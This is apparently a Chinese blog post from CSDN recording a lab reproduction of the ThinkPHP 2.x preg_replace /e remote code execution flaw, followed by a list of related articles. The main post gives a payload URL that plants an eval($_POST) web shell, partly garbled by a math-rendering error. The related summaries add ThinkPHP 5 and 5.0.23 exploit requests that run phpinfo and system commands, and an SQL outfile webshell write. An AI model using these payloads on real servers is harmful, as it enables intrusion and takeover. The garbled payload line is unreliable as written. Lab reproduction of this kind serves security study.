thinkphp 2 - rce漏洞复现

最新推荐文章于 2024-12-03 13:03:22 发布

"七鹊"

最新推荐文章于 2024-12-03 13:03:22 发布

阅读量236

点赞数

文章标签：网络安全

本文链接：https://blog.youkuaiyun.com/2301_76467680/article/details/131440006

版权

用渗透版火狐打开

http://192.168.127.131:8080/?s=/index/index/L/KaTeX parse error: Expected '}', got 'EOF' at end of input:{@print(eval(_POST[1]))}

打开页面成功说明存在漏洞

利用eval函数进行绕过

?s=/index/index/L/KaTeX parse error: Expected '}', got 'EOF' at end of input:{@print(eval(_POST[1]))}

使用一剑连接

http://192.168.127.131:8080/?s=/index/index/L/=/index/index/index/index/

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

"七鹊"

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
1
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

[ vulhub漏洞复现篇 ] ThinkPHP 5.0.23-Rce

qq_51577576的博客

10-02

2646

[ vulhub漏洞复现篇 ] ThinkPHP 5.0.23-Rce 漏洞复现 ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中，获取method的方法中没有正确处理方法名，导致攻击者可以调用Request类任意方法并构造利用链，从而导致远程代码执行漏洞。

vuhub thinkphp-5-rce漏洞复现

qq_46804551的博客

04-24

654

搭建 your-ip:8080 搭建成功漏洞复现 ThinkPHP是在中国使用极为广泛的PHP开发框架。在其版本5中，由于框架错误地处理了控制器名称，因此如果网站未启用强制路由（默认设置），则该框架可以执行任何方法，从而导致RCE漏洞。 poc: 它将执行phpinfo /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1

1 条评论您还未登录，请先登录后发表或查看评论

thinkphp2rce漏洞复现

mlws1900的博客

07-07

1134

0x01 漏洞描述描述: ThinkPHP框架 - 是由上海顶想公司开发维护的MVC结构的开源PHP框架,遵循Apache2开源协议发布,是为了敏捷WEB应用开发和简化企业应用开发而诞生的。 ThinkPHP ThinkPHP 2.x版本中，使用preg_replace的/e模式匹配路由导致用户的输入参数被插入双引号中执行，造成任意代码执行漏洞0x02 影响版本影响Thinkphp 2.x的版本0x03 漏洞利用root权限启动docker（我用kali不给root没法搭建环境）查看docker进

ThinkPHP2--RCE漏洞复现

m0_74402888的博客

05-03

1292

var['\1']="\2" 这里双引号引发函数执行，了解为什么${}会执行，在PHP当中，${}是可以构造一个变量的，{}写的是一般的字符，那么就会被当成变量，比如${a}等价于$a，那如果{}写的是一个已知函数名称呢？()值提取匹配的字符串，有几个括号就代表有几个匹配的字符串，看结果我们就知道，我们的目的是将键和值分别提取出来，所有有两个()，一个匹配键，一个匹配值。$a的执行语句执行了（注意如果要实现该代码需要修改php的版本为5.x的版本）s=a/a/a/${phpinfo()} 其中a随意。

Thinkphp 2.x rce

qq_53086690的博客

11-23

970

Thinkphp 2.x rce Thinkphp简介 Thinkphp 是一个开源的，快速、简单的面向对象的轻量级PHP开发框架漏洞影响版本 Thinkphp 2.x 漏洞概述 ThinkPHP 2.x版本中，使用preg_replace的/e模式匹配路由：$res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths)); 导致用户的输入参数被插入双引号中执行，

Thinkphp 2-rce漏洞复现(全过程)

最新发布

2401_87057954的博客

12-03

680

php漏洞复现

ThinkPHP2-RCE漏洞复现

weixin_73180072的博客

09-10

1016

这个函数会接收用户的输入，并将其存储在一个缓存文件中，以供后续使用。然而，由于没有对用户输入进行适当的过滤和验证，攻击者可以构造一个包含恶意代码的输入数据，并将其提交给该函数。当其他用户访问该应用程序时，这些恶意代码就会被执行，攻击者就可以控制整个服务器。造成该漏洞的原因在于ThinkPHP 2.x版本中，某些函数没有对用户输入进行严格的过滤和验证，导致攻击者可以通过构造恶意输入来绕过安全防护，执行恶意代码。攻击者通过利用该漏洞，可以在服务器上执行任意PHP代码，从而控制服务器。成功连接，获取shell。

Thinkphp 2-rce 漏洞复现（vulhub）

MDSEC的博客

08-20

361

首先，你需要在本地或虚拟机上搭建一个运行Vulhub的环境。你可以从Vulhub的GitHub仓库中下载并安装Docker和docker-compose工具，然后克隆对应的ThinkPHP 2漏洞利用环境。在浏览器中，你将看到一个简单的ThinkPHP应用程序。根据漏洞描述，你需要在URL中添加参数来触发漏洞。如果成功利用漏洞，你将在浏览器中看到返回的结果，例如当前用户的信息。将上述URL参数添加到应用程序的URL后面，然后按回车键执行请求。进入ThinkPHP 2漏洞利用环境所在的目录，打开。

thinkphp 2-rce

weixin_51692662的博客

11-01

563

thinkphp 2-rce

thinkphp2-rce远程代码执行漏洞

weixin_45653478的博客

04-27

527

ThinkPHP 2.x版本中，使用的/e模式匹配路由：导致用户的输入参数被插入双引号中执行，造成任意代码执行漏洞。ThinkPHP 3.0版本因为Lite模式下没有修复该漏洞，也存在这个漏洞。

ThinkPHP 2.x RCE

weixin_45439731的博客

07-26

374

preg_replace(‘正则规则’，‘替换字符’，‘目标字符’)即：在目标字符中寻找符合正则规则的字符，替换为替换字符，如果此时的正则规则中使用了/e这个修饰符，则存在代码执行漏洞。知识点：/e 修饰符配合preg_replace()函数使用，可以把匹配到的字符串当作正则表达式执行PHP版本在5.2~5.6可以执行，但在PHP>=7时，不支持/e修饰符。

thinkphp/5.0.23-rce漏洞复现

qq_46804551的博客

04-22

1058

环境搭建访问your-ip:8080 环境搭建成功漏洞复现 thinkphp 5.0.23（完整版）debug模式 32、(post)public/index.php (data)_method=__construct&filter[]=system&server[REQUEST_METHOD]=touch%20/tmp/xxx thinkphp 5.0.23(完整版) 33、（post）public/index.php?s=captcha (data) _method=__co

Thinkphp2.1爆出重大安全漏洞

weixin_34261739的博客

04-01

606

thinkphp 2.1的版本我们来分析下漏洞吧官方发布了一个安全补丁表述是：该URL安全漏洞会造成用户在客户端伪造URL，执行非法代码。官方的补丁: /trunk/ThinkPHP/Lib/Core/Dispatcher.class.php 125 –$res = preg_replace(‘@(w+)’.$depr.’([^'.$depr.'/]+)@e’, ‘$var['\1']...

vulhub thinkphp漏洞复现 | in-sqliniection、2-rce、5.0.23-rce、5-rce漏洞复现（详细图解）

鱼溯的博客

02-02

2052

vulhub thinkphp漏洞复现 | in-sqliniection、2-rce、5.0.23-rce、5-rce漏洞复现（详细图解）

thinkphp-2x-rce 1 代码执行

weixin_51558394的博客

08-17

520

thinkphp-2x-rce 代码执行

thinkphp2.xRCE漏洞复现

kjssy的博客

08-19

198

启动环境之后访问ip:8080。

【自用】Thinkphp 2.0rce漏洞复现笔记

ex_island的博客

09-09

290

简单记录了一下学习Thinkphp 2.0rce的漏洞复现过程

Thinkphp常见漏洞利用

未完成的歌~的博客

04-14

4279

ThinkPHP是一个开源，快速、简单的轻量级国产PHP开发框架，诞生于2006年初，原名FCS，2007年元旦正式更名为ThinkPHP。使用面向对象的开发结构和MVC模式，融合了Struts的思想和TagLib（标签库）、RoR的ORM映射和ActiveRecord模式。ThinkPHP可以支持windows/Unix/Linux等服务器环境，正式版需要PHP 5.0以上版本，支持MySql、PgSQL、Sqlite多种数据库以及PDO扩展，是一款跨平台，跨版本以及简单易用的PHP框架。

thinkphp3.2.3 rce漏洞复现

08-12

根据引用中提供的信息，ThinkPHP3.2.x存在一个RCE（远程代码执行）漏洞。根据引用中的描述，我们可以通过控制`$this->img`变量来找到`destroy()`函数。在`ThinkPHP/Library/Think/Session/Driver/Memcache.class.php`文件中的`Memcache`类的`destroy()`函数中可以找到这个函数。请注意，如果使用PHP7，在调用有参函数但没有传入参数的情况下会报错，因此应该使用PHP5而不是PHP7。具体的漏洞利用方法是，在URL中注入`?id=1*/ into outfile "path/1.php" LINES STARTING BY '<?php eval($_POST123 #### 引用[.reference_title] - *1* [wp 篇 DASCTF Thinkphp 3.2.3RCE复现](https://blog.youkuaiyun.com/weixin_46203060/article/details/119532553)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* *3* [【安全漏洞】ThinkPHP 3.2.3 漏洞复现](https://blog.youkuaiyun.com/2201_75857869/article/details/129316463)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]